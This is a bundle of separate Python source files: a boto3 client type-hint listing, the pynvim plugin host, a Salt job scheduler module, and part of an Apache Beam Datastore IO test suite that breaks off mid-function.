""":type : pyboto3.marketplace_entitlement"""
marketplacecommerceanalytics = boto3.client("marketplacecommerceanalytics")
""":type : pyboto3.marketplacecommerceanalytics"""
mediaconnect = boto3.client("mediaconnect")
""":type : pyboto3.mediaconnect"""
mediaconvert = boto3.client("mediaconvert")
""":type : pyboto3.mediaconvert"""
medialive = boto3.client("medialive")
""":type : pyboto3.medialive"""
mediapackage = boto3.client("mediapackage")
""":type : pyboto3.mediapackage"""
mediapackage_vod = boto3.client("mediapackage-vod")
""":type : pyboto3.mediapackage_vod"""
mediastore = boto3.client("mediastore")
""":type : pyboto3.mediastore"""
mediastore_data = boto3.client("mediastore-data")
""":type : pyboto3.mediastore_data"""
mediatailor = boto3.client("mediatailor")
""":type : pyboto3.mediatailor"""
meteringmarketplace = boto3.client("meteringmarketplace")
""":type : pyboto3.meteringmarketplace"""
mgh = boto3.client("mgh")
""":type : pyboto3.mgh"""
migrationhub_config = boto3.client("migrationhub-config")
""":type : pyboto3.migrationhub_config"""
mobile = boto3.client("mobile")
""":type : pyboto3.mobile"""
mq = boto3.client("mq")
""":type : pyboto3.mq"""
mturk = boto3.client("mturk")
""":type : pyboto3.mturk"""
neptune = boto3.client("neptune")
""":type : pyboto3.neptune"""
networkmanager = boto3.client("networkmanager")
""":type : pyboto3.networkmanager"""
opsworks = boto3.client("opsworks")
""":type : pyboto3.opsworks"""
opsworkscm = boto3.client("opsworkscm")
""":type : pyboto3.opsworkscm"""
organizations = boto3.client("organizations")
""":type : pyboto3.organizations"""
outposts = boto3.client("outposts")
""":type : pyboto3.outposts"""
personalize = boto3.client("personalize")
""":type : pyboto3.personalize"""
personalize_events = boto3.client("personalize-events")
""":type : pyboto3.personalize_events"""
personalize_runtime = boto3.client("personalize-runtime")
""":type : pyboto3.personalize_runtime"""
pi = boto3.client("pi")
""":type : pyboto3.pi"""
pinpoint = boto3.client("pinpoint")
""":type : pyboto3.pinpoint"""
pinpoint_email = boto3.client("pinpoint-email")
""":type : pyboto3.pinpoint_email"""
pinpoint_sms_voice = boto3.client("pinpoint-sms-voice")
""":type : pyboto3.pinpoint_sms_voice"""
polly = boto3.client("polly")
""":type : pyboto3.polly"""
pricing = boto3.client("pricing")
""":type : pyboto3.pricing"""
qldb = boto3.client("qldb")
""":type : pyboto3.qldb"""
qldb_session = boto3.client("qldb-session")
""":type : pyboto3.qldb_session"""
quicksight = boto3.client("quicksight")
""":type : pyboto3.quicksight"""
ram = boto3.client("ram")
""":type : pyboto3.ram"""
rds = boto3.client("rds")
""":type : pyboto3.rds"""
rds_data = boto3.client("rds-data")
""":type : pyboto3.rds_data"""
redshift = boto3.client("redshift")
""":type : pyboto3.redshift"""
rekognition = boto3.client("rekognition")
""":type : pyboto3.rekognition"""
resource_groups = boto3.client("resource-groups")
""":type : pyboto3.resource_groups"""
resourcegroupstaggingapi = boto3.client("resourcegroupstaggingapi")
""":type : pyboto3.resourcegroupstaggingapi"""
robomaker = boto3.client("robomaker")
""":type : pyboto3.robomaker"""
route53 = boto3.client("route53")
""":type : pyboto3.route53"""
route53domains = boto3.client("route53domains")
""":type : pyboto3.route53domains"""
route53resolver = boto3.client("route53resolver")
""":type : pyboto3.route53resolver"""
s3 = boto3.client("s3")
""":type : pyboto3.s3"""
s3control = boto3.client("s3control")
""":type : pyboto3.s3control"""
sagemaker = boto3.client("sagemaker")
""":type : pyboto3.sagemaker"""
sagemaker_a2i_runtime = boto3.client("sagemaker-a2i-runtime")
""":type : pyboto3.sagemaker_a2i_runtime"""
sagemaker_runtime = boto3.client("sagemaker-runtime")
""":type : pyboto3.sagemaker_runtime"""
savingsplans = boto3.client("savingsplans")
""":type : pyboto3.savingsplans"""
schemas = boto3.client("schemas")
""":type : pyboto3.schemas"""
sdb = boto3.client("sdb")
""":type : pyboto3.sdb"""
secretsmanager = boto3.client("secretsmanager")
""":type : pyboto3.secretsmanager"""
securityhub = boto3.client("securityhub")
""":type : pyboto3.securityhub"""
serverlessrepo = boto3.client("serverlessrepo")
""":type : pyboto3.serverlessrepo"""
service_quotas = boto3.client("service-quotas")
""":type : pyboto3.service_quotas"""
servicecatalog = boto3.client("servicecatalog")
""":type : pyboto3.servicecatalog"""
servicediscovery = boto3.client("servicediscovery")
""":type : pyboto3.servicediscovery"""
ses = boto3.client("ses")
""":type : pyboto3.ses"""
sesv2 = boto3.client("sesv2")
""":type : pyboto3.sesv2"""
shield = boto3.client("shield")
""":type : pyboto3.shield"""
signer = boto3.client("signer")
""":type : pyboto3.signer"""
sms = boto3.client("sms")
""":type : pyboto3.sms"""
sms_voice = boto3.client("sms-voice")
""":type : pyboto3.sms_voice"""
snowball = boto3.client("snowball")
""":type : pyboto3.snowball"""
sns = boto3.client("sns")
""":type : pyboto3.sns"""
sqs = boto3.client("sqs")
""":type : pyboto3.sqs"""
ssm = boto3.client("ssm")
""":type : pyboto3.ssm"""
sso = boto3.client("sso")
""":type : pyboto3.sso"""
sso_oidc = boto3.client("sso-oidc")
""":type : pyboto3.sso_oidc"""
stepfunctions = boto3.client("stepfunctions")
""":type : pyboto3.stepfunctions"""
storagegateway = boto3.client("storagegateway")
""":type : pyboto3.storagegateway"""
sts = boto3.client("sts")
""":type : pyboto3.sts"""
support = boto3.client("support")
""":type : pyboto3.support"""
swf = boto3.client("swf")
""":type : pyboto3.swf"""
synthetics = boto3.client("synthetics")
""":type : pyboto3.synthetics"""
textract = boto3.client("textract")
""":type : pyboto3.textract"""
transcribe = boto3.client("transcribe")
""":type : pyboto3.transcribe"""
transfer = boto3.client("transfer")
""":type : pyboto3.transfer"""
translate = boto3.client("translate")
""":type : pyboto3.translate"""
waf = boto3.client("waf")
""":type : pyboto3.waf"""
waf_regional = boto3.client("waf-regional")
""":type : pyboto3.waf_regional"""
wafv2 = boto3.client("wafv2")
""":type : pyboto3.wafv2"""
workdocs = boto3.client("workdocs")
""":type : pyboto3.workdocs"""
worklink = boto3.client("worklink")
""":type : pyboto3.worklink"""
workmail = boto3.client("workmail")
""":type : pyboto3.workmail"""
workmailmessageflow = boto3.client("workmailmessageflow")
""":type : pyboto3.workmailmessageflow"""
workspaces = boto3.client("workspaces")
""":type : pyboto3.workspaces"""
xray = boto3.client("xray")
""":type : pyboto3.xray"""
| |
"""Implements a Nvim host for python plugins."""
import imp
import inspect
import logging
import os
import os.path
import re
from functools import partial
from traceback import format_exc
from pynvim.api import decode_if_bytes, walk
from pynvim.compat import IS_PYTHON3, find_module
from pynvim.msgpack_rpc import ErrorResponse
from pynvim.plugin import script_host
from pynvim.util import format_exc_skip, get_client_info
__all__ = ('Host')
logger = logging.getLogger(__name__)
error, debug, info, warn = (logger.error, logger.debug, logger.info,
logger.warning,)
host_method_spec = {"poll": {}, "specs": {"nargs": 1}, "shutdown": {}}
class Host(object):
    """Nvim host for python plugins.

    Takes care of loading/unloading plugins and routing msgpack-rpc
    requests/notifications to the appropriate handlers.
    """

    def __init__(self, nvim):
        """Set handlers for plugin_load/plugin_unload."""
        self.nvim = nvim
        self._specs = {}          # plugin path -> list of rpc specs
        self._loaded = {}         # plugin path -> {'handlers': [...], 'module': m}
        self._load_errors = {}    # plugin path -> formatted load error text
        self._notification_handlers = {
            'nvim_error_event': self._on_error_event
        }
        self._request_handlers = {
            'poll': lambda: 'ok',
            'specs': self._on_specs_request,
            'shutdown': self.shutdown
        }
        # Decode per default for Python3
        self._decode_default = IS_PYTHON3

    def _on_async_err(self, msg):
        # uncaught python exception
        self.nvim.err_write(msg, async_=True)

    def _on_error_event(self, kind, msg):
        # error from nvim due to async request
        # like nvim.command(..., async_=True)
        errmsg = "{}: Async request caused an error:\n{}\n".format(
            self.name, decode_if_bytes(msg))
        self.nvim.err_write(errmsg, async_=True)
        return errmsg

    def start(self, plugins):
        """Start listening for msgpack-rpc requests and notifications."""
        self.nvim.run_loop(self._on_request,
                           self._on_notification,
                           lambda: self._load(plugins),
                           err_cb=self._on_async_err)

    def shutdown(self):
        """Shutdown the host."""
        self._unload()
        self.nvim.stop_loop()

    def _wrap_delayed_function(self, cls, delayed_handlers, name, sync,
                               module_handlers, path, *args):
        """First-call trampoline for a plugin class's handlers.

        Instantiates the plugin lazily on first use, swaps the delayed
        handlers for real bound ones, then forwards the triggering call.
        """
        # delete the delayed handlers to be sure
        for handler in delayed_handlers:
            method_name = handler._nvim_registered_name
            if handler._nvim_rpc_sync:
                del self._request_handlers[method_name]
            else:
                del self._notification_handlers[method_name]
        # create an instance of the plugin and pass the nvim object
        plugin = cls(self._configure_nvim_for(cls))
        # discover handlers in the plugin instance
        self._discover_functions(plugin, module_handlers, path, False)
        # Forward the original call to the now-registered real handler.
        if sync:
            self._request_handlers[name](*args)
        else:
            self._notification_handlers[name](*args)

    def _wrap_function(self, fn, sync, decode, nvim_bind, name, *args):
        """Invoke a handler, applying decoding/binding and error reporting."""
        if decode:
            args = walk(decode_if_bytes, args, decode)
        if nvim_bind is not None:
            args.insert(0, nvim_bind)
        try:
            return fn(*args)
        except Exception:
            # Sync handlers report errors back to the caller; async ones can
            # only surface them via err_write.
            if sync:
                msg = ("error caught in request handler '{} {}':\n{}"
                       .format(name, args, format_exc_skip(1)))
                raise ErrorResponse(msg)
            else:
                msg = ("error caught in async handler '{} {}'\n{}\n"
                       .format(name, args, format_exc_skip(1)))
                self._on_async_err(msg + "\n")

    def _on_request(self, name, args):
        """Handle a msgpack-rpc request."""
        if IS_PYTHON3:
            name = decode_if_bytes(name)
        handler = self._request_handlers.get(name, None)
        if not handler:
            msg = self._missing_handler_error(name, 'request')
            error(msg)
            raise ErrorResponse(msg)

        debug('calling request handler for "%s", args: "%s"', name, args)
        rv = handler(*args)
        debug("request handler for '%s %s' returns: %s", name, args, rv)
        return rv

    def _on_notification(self, name, args):
        """Handle a msgpack-rpc notification."""
        if IS_PYTHON3:
            name = decode_if_bytes(name)
        handler = self._notification_handlers.get(name, None)
        if not handler:
            msg = self._missing_handler_error(name, 'notification')
            error(msg)
            self._on_async_err(msg + "\n")
            return

        debug('calling notification handler for "%s", args: "%s"', name, args)
        handler(*args)

    def _missing_handler_error(self, name, kind):
        """Build the error text for an unregistered handler name.

        Handler names are prefixed with the plugin path; if that plugin
        failed to load, append its load error for context.
        """
        msg = 'no {} handler registered for "{}"'.format(kind, name)
        pathmatch = re.match(r'(.+):[^:]+:[^:]+', name)
        if pathmatch:
            loader_error = self._load_errors.get(pathmatch.group(1))
            if loader_error is not None:
                msg = msg + "\n" + loader_error
        return msg

    def _load(self, plugins):
        """Import each plugin file and register its discovered handlers."""
        has_script = False
        for path in plugins:
            err = None
            if path in self._loaded:
                error('{} is already loaded'.format(path))
                continue
            try:
                if path == "script_host.py":
                    module = script_host
                    has_script = True
                else:
                    directory, name = os.path.split(os.path.splitext(path)[0])
                    file, pathname, descr = find_module(name, [directory])
                    module = imp.load_module(name, file, pathname, descr)
                handlers = []
                self._discover_classes(module, handlers, path)
                self._discover_functions(module, handlers, path, False)
                if not handlers:
                    error('{} exports no handlers'.format(path))
                    continue
                self._loaded[path] = {'handlers': handlers, 'module': module}
            except Exception as e:
                err = ('Encountered {} loading plugin at {}: {}\n{}'
                       .format(type(e).__name__, path, e, format_exc(5)))
                error(err)
                self._load_errors[path] = err

        kind = ("script-host" if len(plugins) == 1 and has_script
                else "rplugin-host")
        # NOTE: this local `info` shadows the module-level `info` log alias.
        info = get_client_info(kind, 'host', host_method_spec)
        self.name = info[0]
        self.nvim.api.set_client_info(*info, async_=True)

    def _unload(self):
        """Run shutdown hooks and deregister every loaded handler."""
        for path, plugin in self._loaded.items():
            handlers = plugin['handlers']
            for handler in handlers:
                method_name = handler._nvim_registered_name
                if hasattr(handler, '_nvim_shutdown_hook'):
                    handler()
                elif handler._nvim_rpc_sync:
                    del self._request_handlers[method_name]
                else:
                    del self._notification_handlers[method_name]
        self._specs = {}
        self._loaded = {}

    def _discover_classes(self, module, handlers, plugin_path):
        """Register handlers of every @plugin-decorated class in *module*."""
        for _, cls in inspect.getmembers(module, inspect.isclass):
            if getattr(cls, '_nvim_plugin', False):
                # discover handlers in the plugin instance
                self._discover_functions(cls, handlers, plugin_path, True)

    def _discover_functions(self, obj, handlers, plugin_path, delay):
        """Find rpc-decorated callables on *obj* and register wrappers.

        When *delay* is true the target is a class: registration uses
        _wrap_delayed_function so instantiation happens on first call.
        """
        def predicate(o):
            return hasattr(o, '_nvim_rpc_method_name')

        cls_handlers = []
        specs = []
        objdecode = getattr(obj, '_nvim_decode', self._decode_default)
        for _, fn in inspect.getmembers(obj, predicate):
            method = fn._nvim_rpc_method_name
            if fn._nvim_prefix_plugin_path:
                method = '{}:{}'.format(plugin_path, method)
            sync = fn._nvim_rpc_sync
            if delay:
                fn_wrapped = partial(self._wrap_delayed_function, obj,
                                     cls_handlers, method, sync,
                                     handlers, plugin_path)
            else:
                decode = getattr(fn, '_nvim_decode', objdecode)
                nvim_bind = None
                if fn._nvim_bind:
                    nvim_bind = self._configure_nvim_for(fn)

                fn_wrapped = partial(self._wrap_function, fn,
                                     sync, decode, nvim_bind, method)
            self._copy_attributes(fn, fn_wrapped)
            fn_wrapped._nvim_registered_name = method
            # register in the rpc handler dict
            if sync:
                if method in self._request_handlers:
                    raise Exception(('Request handler for "{}" is '
                                     + 'already registered').format(method))
                self._request_handlers[method] = fn_wrapped
            else:
                if method in self._notification_handlers:
                    raise Exception(('Notification handler for "{}" is '
                                     + 'already registered').format(method))
                self._notification_handlers[method] = fn_wrapped
            if hasattr(fn, '_nvim_rpc_spec'):
                specs.append(fn._nvim_rpc_spec)
            handlers.append(fn_wrapped)
            cls_handlers.append(fn_wrapped)
        if specs:
            self._specs[plugin_path] = specs

    def _copy_attributes(self, fn, fn2):
        # Copy _nvim_* attributes from the original function
        for attr in dir(fn):
            if attr.startswith('_nvim_'):
                setattr(fn2, attr, getattr(fn, attr))

    def _on_specs_request(self, path):
        """Return the rpc specs for *path*, echoing any load error first."""
        if IS_PYTHON3:
            path = decode_if_bytes(path)
        if path in self._load_errors:
            self.nvim.out_write(self._load_errors[path] + '\n')
        return self._specs.get(path, 0)

    def _configure_nvim_for(self, obj):
        # Configure a nvim instance for obj (checks encoding configuration)
        nvim = self.nvim
        decode = getattr(obj, '_nvim_decode', self._decode_default)
        if decode:
            nvim = nvim.with_decode(decode)
        return nvim
| |
# -*- coding: utf-8 -*-
'''
Scheduling routines are located here. To activate the scheduler make the
schedule option available to the master or minion configurations (master config
file or for the minion via config or pillar)
code-block:: yaml
schedule:
job1:
function: state.sls
seconds: 3600
args:
- httpd
kwargs:
test: True
This will schedule the command: state.sls httpd test=True every 3600 seconds
(every hour)
The scheduler also supports ensuring that there are no more than N copies of
a particular routine running. Use this for jobs that may be long-running
and could step on each other or pile up in case of infrastructure outage.
The default for maxrunning is 1.
code-block:: yaml
schedule:
long_running_job:
function: big_file_transfer
jid_include: True
maxrunning: 1
'''
# Import python libs
import os
import time
import datetime
import multiprocessing
import threading
import sys
import logging
# Import Salt libs
import salt.utils
import salt.utils.process
from salt.utils.odict import OrderedDict
import salt.payload
log = logging.getLogger(__name__)
class Schedule(object):
    '''
    Create a Schedule object, pass in the opts and the functions dict to use
    '''
    def __init__(self, opts, functions, returners=None, intervals=None):
        self.opts = opts
        self.functions = functions
        if isinstance(intervals, dict):
            self.intervals = intervals
        else:
            self.intervals = {}
        if isinstance(returners, dict):
            self.returners = returners
        else:
            self.returners = {}
        self.schedule_returner = self.option('schedule_returner')
        # Keep track of the lowest loop interval needed in this variable
        # (sys.maxsize replaces the py2-only sys.maxint; it exists on
        # python 2.6+ and python 3, so this stays backward-compatible).
        self.loop_interval = sys.maxsize
        clean_proc_dir(opts)

    def option(self, opt):
        '''
        Return the schedule data structure
        '''
        if 'config.merge' in self.functions:
            return self.functions['config.merge'](opt, {}, omit_master=True)
        return self.opts.get(opt, {})

    def handle_func(self, func, data):
        '''
        Execute this method in a multiprocess or thread
        '''
        if salt.utils.is_windows():
            # Windows processes don't inherit the loader state; reload it.
            # NOTE(review): relies on salt.loader / salt.minion being
            # importable as attributes of the `salt` package — confirm the
            # module imports them explicitly.
            self.functions = salt.loader.minion_mods(self.opts)
            self.returners = salt.loader.returners(self.opts, self.functions)
        ret = {'id': self.opts.get('id', 'master'),
               'fun': func,
               'jid': '{0:%Y%m%d%H%M%S%f}'.format(datetime.datetime.now())}
        proc_fn = os.path.join(
            salt.minion.get_proc_dir(self.opts['cachedir']),
            ret['jid']
        )
        # Check to see if there are other jobs with this
        # signature running. If there are more than maxrunning
        # jobs present then don't start another.
        # If jid_include is False for this job we can ignore all this
        # NOTE--jid_include defaults to True, thus if it is missing from the data
        # dict we treat it like it was there and is True
        if 'jid_include' not in data or data['jid_include']:
            jobcount = 0
            for basefilename in os.listdir(salt.minion.get_proc_dir(self.opts['cachedir'])):
                fn = os.path.join(salt.minion.get_proc_dir(self.opts['cachedir']), basefilename)
                with salt.utils.fopen(fn, 'r') as fp_:
                    job = salt.payload.Serial(self.opts).load(fp_)
                    log.debug('schedule.handle_func: Checking job against '
                              'fun {0}: {1}'.format(ret['fun'], job))
                    if ret['fun'] == job['fun']:
                        jobcount += 1
                        log.debug(
                            'schedule.handle_func: Incrementing jobcount, now '
                            '{0}, maxrunning is {1}'.format(
                                jobcount, data['maxrunning']))
                        if jobcount >= data['maxrunning']:
                            log.debug(
                                'schedule.handle_func: The scheduled job {0} '
                                'was not started, {1} already running'.format(
                                    func, data['maxrunning']))
                            return False
        salt.utils.daemonize_if(self.opts)
        ret['pid'] = os.getpid()
        if 'jid_include' not in data or data['jid_include']:
            log.debug('schedule.handle_func: adding this job to the jobcache '
                      'with data {0}'.format(ret))
            # write this to /var/cache/salt/minion/proc
            with salt.utils.fopen(proc_fn, 'w+') as fp_:
                fp_.write(salt.payload.Serial(self.opts).dumps(ret))
        args = None
        if 'args' in data:
            args = data['args']
        kwargs = None
        if 'kwargs' in data:
            kwargs = data['kwargs']
        if args and kwargs:
            ret['return'] = self.functions[func](*args, **kwargs)
        if args and not kwargs:
            ret['return'] = self.functions[func](*args)
        if kwargs and not args:
            ret['return'] = self.functions[func](**kwargs)
        if not kwargs and not args:
            ret['return'] = self.functions[func]()
        data_returner = data.get('returner', None)
        if data_returner or self.schedule_returner:
            rets = []
            for returner in [data_returner, self.schedule_returner]:
                if isinstance(returner, str):
                    rets.append(returner)
                elif isinstance(returner, list):
                    rets.extend(returner)
            # simple de-duplication with order retained
            rets = OrderedDict.fromkeys(rets).keys()
            for returner in rets:
                ret_str = '{0}.returner'.format(returner)
                if ret_str in self.returners:
                    ret['success'] = True
                    self.returners[ret_str](ret)
                else:
                    log.info(
                        'Job {0} using invalid returner: {1} Ignoring.'.format(
                            func, returner
                        )
                    )
        try:
            os.unlink(proc_fn)
        except OSError:
            pass

    def eval(self):
        '''
        Evaluate and execute the schedule
        '''
        schedule = self.option('schedule')
        if not isinstance(schedule, dict):
            return
        for job, data in schedule.items():
            if 'function' in data:
                func = data['function']
            elif 'func' in data:
                func = data['func']
            elif 'fun' in data:
                func = data['fun']
            else:
                func = None
            if func not in self.functions:
                # BUG FIX: the format arguments were swapped (job, func),
                # which logged the job name where the function belongs.
                log.info(
                    'Invalid function: {0} in job {1}. Ignoring.'.format(
                        func, job
                    )
                )
                continue
            # Add up how many seconds between now and then
            seconds = 0
            seconds += int(data.get('seconds', 0))
            seconds += int(data.get('minutes', 0)) * 60
            seconds += int(data.get('hours', 0)) * 3600
            seconds += int(data.get('days', 0)) * 86400
            # Check if the seconds variable is lower than current lowest
            # loop interval needed. If it is lower then overwrite variable
            # external loops using can then check this variable for how often
            # they need to reschedule themselves
            if seconds < self.loop_interval:
                self.loop_interval = seconds
            now = int(time.time())
            run = False
            if job in self.intervals:
                if now - self.intervals[job] >= seconds:
                    run = True
            else:
                run = True
            if not run:
                continue
            else:
                log.debug('Running scheduled job: {0}'.format(job))
            if 'jid_include' not in data or data['jid_include']:
                data['jid_include'] = True
                log.debug('schedule: This job was scheduled with jid_include, '
                          'adding to cache (jid_include defaults to True)')
                if 'maxrunning' in data:
                    log.debug('schedule: This job was scheduled with a max '
                              'number of {0}'.format(data['maxrunning']))
                else:
                    log.info('schedule: maxrunning parameter was not specified for '
                             'job {0}, defaulting to 1.'.format(job))
                    data['maxrunning'] = 1
            try:
                if self.opts.get('multiprocessing', True):
                    thread_cls = multiprocessing.Process
                else:
                    thread_cls = threading.Thread
                proc = thread_cls(target=self.handle_func, args=(func, data))
                proc.start()
                if self.opts.get('multiprocessing', True):
                    proc.join()
            finally:
                # Record the start time even if spawning the job failed so
                # the interval bookkeeping stays consistent.
                self.intervals[job] = int(time.time())
def clean_proc_dir(opts):
    '''
    Loop through jid files in the minion proc directory (default /var/cache/salt/minion/proc)
    and remove any that refer to processes that no longer exist
    '''
    for basefilename in os.listdir(salt.minion.get_proc_dir(opts['cachedir'])):
        fn = os.path.join(salt.minion.get_proc_dir(opts['cachedir']), basefilename)
        with salt.utils.fopen(fn, 'r') as fp_:
            job = salt.payload.Serial(opts).load(fp_)
            log.debug('schedule.clean_proc_dir: checking job {0} for process '
                      'existence'.format(job))
            if job is not None and 'pid' in job:
                if salt.utils.process.os_is_running(job['pid']):
                    # Process still alive: keep its proc file.
                    # NOTE(review): this log message says "Cleaning proc dir"
                    # on the keep path, which reads backwards — consider
                    # rewording upstream.
                    log.debug('schedule.clean_proc_dir: Cleaning proc dir, '
                              'pid {0} still exists.'.format(job['pid']))
                else:
                    # Windows cannot delete an open file
                    if salt.utils.is_windows():
                        fp_.close()
                    # Maybe the file is already gone
                    try:
                        os.unlink(fn)
                    except OSError:
                        pass
| |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from mock import MagicMock
from mock import call
from mock import patch
from apache_beam.io.gcp.datastore.v1 import fake_datastore
from apache_beam.io.gcp.datastore.v1 import helper
from apache_beam.io.gcp.datastore.v1 import query_splitter
from apache_beam.io.gcp.datastore.v1.datastoreio import ReadFromDatastore
from apache_beam.io.gcp.datastore.v1.datastoreio import WriteToDatastore
from apache_beam.io.gcp.datastore.v1.datastoreio import _Mutate
# Protect against environments where datastore library is not available.
# pylint: disable=wrong-import-order, wrong-import-position, ungrouped-imports
try:
from google.cloud.proto.datastore.v1 import datastore_pb2
from google.cloud.proto.datastore.v1 import query_pb2
from google.protobuf import timestamp_pb2
from googledatastore import helper as datastore_helper
except ImportError:
datastore_pb2 = None
# pylint: enable=wrong-import-order, wrong-import-position, ungrouped-imports
@unittest.skipIf(datastore_pb2 is None, 'GCP dependencies are not installed')
class DatastoreioTest(unittest.TestCase):
  """Tests for ReadFromDatastore/WriteToDatastore against a mocked datastore."""
  _PROJECT = 'project'
  _KIND = 'kind'
  _NAMESPACE = 'namespace'

  def setUp(self):
    self._mock_datastore = MagicMock()
    self._query = query_pb2.Query()
    self._query.kind.add().name = self._KIND

  def test_get_estimated_size_bytes_without_namespace(self):
    entity_bytes = 100
    timestamp = timestamp_pb2.Timestamp(seconds=1234)
    self.check_estimated_size_bytes(entity_bytes, timestamp)

  def test_get_estimated_size_bytes_with_namespace(self):
    entity_bytes = 100
    timestamp = timestamp_pb2.Timestamp(seconds=1234)
    self.check_estimated_size_bytes(entity_bytes, timestamp, self._NAMESPACE)

  def test_SplitQueryFn_with_num_splits(self):
    """An explicit num_splits must yield exactly that many sub-queries."""
    with patch.object(helper, 'get_datastore',
                      return_value=self._mock_datastore):
      num_splits = 23

      def fake_get_splits(datastore, query, num_splits, partition=None):
        return self.split_query(query, num_splits)

      with patch.object(query_splitter, 'get_splits',
                        side_effect=fake_get_splits):
        split_query_fn = ReadFromDatastore.SplitQueryFn(
            self._PROJECT, self._query, None, num_splits)
        split_query_fn.start_bundle()
        returned_split_queries = []
        for split_query in split_query_fn.process(self._query):
          returned_split_queries.append(split_query)

        self.assertEqual(len(returned_split_queries), num_splits)
        # No estimation query should run when num_splits is given.
        self.assertEqual(0, len(self._mock_datastore.run_query.call_args_list))
        self.verify_unique_keys(returned_split_queries)

  def test_SplitQueryFn_without_num_splits(self):
    """With num_splits=0 the split count is derived from the size estimate."""
    with patch.object(helper, 'get_datastore',
                      return_value=self._mock_datastore):
      # Force SplitQueryFn to compute the number of query splits
      num_splits = 0
      expected_num_splits = 23
      entity_bytes = (expected_num_splits *
                      ReadFromDatastore._DEFAULT_BUNDLE_SIZE_BYTES)

      with patch.object(ReadFromDatastore, 'get_estimated_size_bytes',
                        return_value=entity_bytes):

        def fake_get_splits(datastore, query, num_splits, partition=None):
          return self.split_query(query, num_splits)

        with patch.object(query_splitter, 'get_splits',
                          side_effect=fake_get_splits):
          split_query_fn = ReadFromDatastore.SplitQueryFn(
              self._PROJECT, self._query, None, num_splits)
          split_query_fn.start_bundle()
          returned_split_queries = []
          for split_query in split_query_fn.process(self._query):
            returned_split_queries.append(split_query)

          self.assertEqual(len(returned_split_queries), expected_num_splits)
          self.assertEqual(0,
                           len(self._mock_datastore.run_query.call_args_list))
          self.verify_unique_keys(returned_split_queries)

  def test_SplitQueryFn_with_query_limit(self):
    """A test that verifies no split is performed when the query has a limit."""
    with patch.object(helper, 'get_datastore',
                      return_value=self._mock_datastore):
      self._query.limit.value = 3
      split_query_fn = ReadFromDatastore.SplitQueryFn(
          self._PROJECT, self._query, None, 4)
      split_query_fn.start_bundle()
      returned_split_queries = []
      for split_query in split_query_fn.process(self._query):
        returned_split_queries.append(split_query)

      self.assertEqual(1, len(returned_split_queries))
      self.assertEqual(0, len(self._mock_datastore.method_calls))

  def test_SplitQueryFn_with_exception(self):
    """A test that verifies that no split is performed when failures occur."""
    with patch.object(helper, 'get_datastore',
                      return_value=self._mock_datastore):
      # Force SplitQueryFn to compute the number of query splits
      num_splits = 0
      expected_num_splits = 1
      entity_bytes = (expected_num_splits *
                      ReadFromDatastore._DEFAULT_BUNDLE_SIZE_BYTES)

      with patch.object(ReadFromDatastore, 'get_estimated_size_bytes',
                        return_value=entity_bytes):
        with patch.object(query_splitter, 'get_splits',
                          side_effect=ValueError("Testing query split error")):
          split_query_fn = ReadFromDatastore.SplitQueryFn(
              self._PROJECT, self._query, None, num_splits)
          split_query_fn.start_bundle()
          returned_split_queries = []
          for split_query in split_query_fn.process(self._query):
            returned_split_queries.append(split_query)

          # The splitter failure must fall back to a single, unsplit query.
          self.assertEqual(len(returned_split_queries), expected_num_splits)
          self.assertEqual(returned_split_queries[0][1], self._query)
          self.assertEqual(0,
                           len(self._mock_datastore.run_query.call_args_list))
          self.verify_unique_keys(returned_split_queries)

  def test_DatastoreWriteFn_with_emtpy_batch(self):
    self.check_DatastoreWriteFn(0)

  def test_DatastoreWriteFn_with_one_batch(self):
    num_entities_to_write = _Mutate._WRITE_BATCH_INITIAL_SIZE * 1 - 50
    self.check_DatastoreWriteFn(num_entities_to_write)

  def test_DatastoreWriteFn_with_multiple_batches(self):
    num_entities_to_write = _Mutate._WRITE_BATCH_INITIAL_SIZE * 3 + 50
    self.check_DatastoreWriteFn(num_entities_to_write)

  def test_DatastoreWriteFn_with_batch_size_exact_multiple(self):
    num_entities_to_write = _Mutate._WRITE_BATCH_INITIAL_SIZE * 2
    self.check_DatastoreWriteFn(num_entities_to_write)

  def check_DatastoreWriteFn(self, num_entities):
    """A helper function to test DatastoreWriteFn."""
    with patch.object(helper, 'get_datastore',
                      return_value=self._mock_datastore):
      entities = [e.entity for e in
                  fake_datastore.create_entities(num_entities)]

      # Materialize map() so this works under Python 3 as well, where map()
      # returns a one-shot iterator: the mutations are iterated below AND
      # compared against actual_mutations afterwards.
      expected_mutations = list(
          map(WriteToDatastore.to_upsert_mutation, entities))
      actual_mutations = []

      self._mock_datastore.commit.side_effect = (
          fake_datastore.create_commit(actual_mutations))

      datastore_write_fn = _Mutate.DatastoreWriteFn(
          self._PROJECT, fixed_batch_size=_Mutate._WRITE_BATCH_INITIAL_SIZE)

      datastore_write_fn.start_bundle()
      for mutation in expected_mutations:
        datastore_write_fn.process(mutation)
      datastore_write_fn.finish_bundle()

      self.assertEqual(actual_mutations, expected_mutations)
      # Floor division keeps the expected commit count an int on Python 3
      # too (plain '/' would produce a float and fail the comparison).
      self.assertEqual(
          (num_entities - 1) // _Mutate._WRITE_BATCH_INITIAL_SIZE + 1,
          self._mock_datastore.commit.call_count)

  def test_DatastoreWriteLargeEntities(self):
    """100*100kB entities gets split over two Commit RPCs."""
    with patch.object(helper, 'get_datastore',
                      return_value=self._mock_datastore):
      entities = [e.entity for e in fake_datastore.create_entities(100)]

      datastore_write_fn = _Mutate.DatastoreWriteFn(
          self._PROJECT, fixed_batch_size=_Mutate._WRITE_BATCH_INITIAL_SIZE)
      datastore_write_fn.start_bundle()
      for entity in entities:
        datastore_helper.add_properties(
            entity, {'large': u'A' * 100000}, exclude_from_indexes=True)
        datastore_write_fn.process(WriteToDatastore.to_upsert_mutation(entity))
      datastore_write_fn.finish_bundle()

      self.assertEqual(2, self._mock_datastore.commit.call_count)

  def verify_unique_keys(self, queries):
    """A helper function that verifies if all the queries have unique keys."""
    keys, _ = zip(*queries)
    keys = set(keys)
    self.assertEqual(len(keys), len(queries))

  def check_estimated_size_bytes(self, entity_bytes, timestamp, namespace=None):
    """A helper method to test get_estimated_size_bytes"""
    timestamp_req = helper.make_request(
